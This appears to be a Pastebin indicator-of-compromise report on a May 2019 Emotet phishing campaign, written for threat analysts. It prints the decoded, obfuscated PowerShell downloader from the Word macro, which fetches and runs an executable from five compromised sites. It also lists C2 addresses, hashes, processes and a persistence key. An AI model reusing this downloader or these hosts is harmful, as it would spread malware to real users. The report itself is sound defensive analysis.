VRad

#emotet_150519

May 16th, 2019
672
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
  2.  
  3. https://pastebin.com/F520pqQW
  4.  
  5. previous_contact:
  6. 28/01/19 https://pastebin.com/z2TDfM7s
  7. 23/01/18 https://pastebin.com/D9TDts5J
  8. 20/12/18 https://pastebin.com/EejcbL4t
  9. 04/12/18 https://pastebin.com/znQDtbnt
  10. 09/11/18 https://pastebin.com/THHMs2wg
  11. 01/10/18 https://pastebin.com/Y6DnbpHv
  12.  
  13. FAQ:
  14.  
  15. attack_vector
  16. --------------
  17. email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe
  18.  
  19. email_headers
  20. --------------
  21. Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
  22. Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
  23. Date: Wed, 15 May 2019 17:00:50 -0500
  24. From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
  25. To: <user00@victim01>
  26. Subject: RE: RE: Ціновий запит_комплектація для санвузла
  27.  
  28. files
  29. --------------
  30. SHA-256 e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
  31. File name DATA-916228-2122097647.doc [Composite Document File V2 Document, Application: Microsoft Office Word]
  32. File size 145.13 KB (148608 bytes)
  33.  
  34. SHA-256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
  35. File name l4gktj_307970247.exe [PE32 executable (GUI) Intel 80386, for MS Windows] .!..L.!This program cannot be run in DOS mode.
  36. File size 75 KB (76800 bytes)
  37.  
  38. activity
  39. **************
  40. macro_ps_b64_decoded:
  41. --------------
  42. $d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
  43.  
  44. PL_SCR 5 / 5
  45. --------------
  46. http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
  47. http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
  48. https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
  49. http://adsprout[.] co/wp/oMrTbPUxE/
  50. http://springhelp[.] co[.] za/wp/jMSZNshHRf/
  51.  
  52. C2
  53. --------------
  54. 78.188.7.213:8090
  55. 138.68.13.161:8080
  56.  
  57. netwrk
  58. --------------
  59. 37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 no User Agent (!)
  60. 78.188.7.213 78.188.7.213:8090 POST /health/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
  61. 138.68.13.161 138.68.13.161:8080 POST /loadan/enable/stubs/merge/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
  62.  
  63. comp
  64. --------------
  65. powershell.exe 2632 TCP localhost 49539 37.9.175.14 80 ESTABLISHED
  66. eventssmall.exe 2108 TCP localhost 49540 90.57.69.215 80 SYN_SENT
  67. eventssmall.exe 2108 TCP localhost 49542 191.92.69.115 80 SYN_SENT
  68. eventssmall.exe 2108 TCP localhost 49544 75.177.169.225 80 SYN_SENT
  69. eventssmall.exe 2108 TCP localhost 49546 78.188.7.213 8090 ESTABLISHED
  70. eventssmall.exe 2108 TCP localhost 49547 207.44.45.27 22 SYN_SENT
  71. eventssmall.exe 2108 TCP localhost 49548 138.68.13.161 8080 ESTABLISHED
  72.  
  73. proc
  74. --------------
  75. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  76. ... [another context]
  77. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  78. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
  79. C:\Users\operator\206.exe
  80. C:\Users\operator\206.exe --d4ba2bdd
  81. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  82. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
  83.  
  84. persist
  85. --------------
  86. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 16.05.2019 11:08
  87. eventssmall
  88. c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06
  89.  
  90. drop
  91. --------------
  92. %temp%\VBE\
  93. %temp%\Word8.0\MSForms.exd
  94. C:\Users\operator\206.exe [removed]
  95. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  96.  
  97. # # #
  98.  
  99. https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
  100. https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
  101. https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
  102.  
  103. VR
RAW Paste Data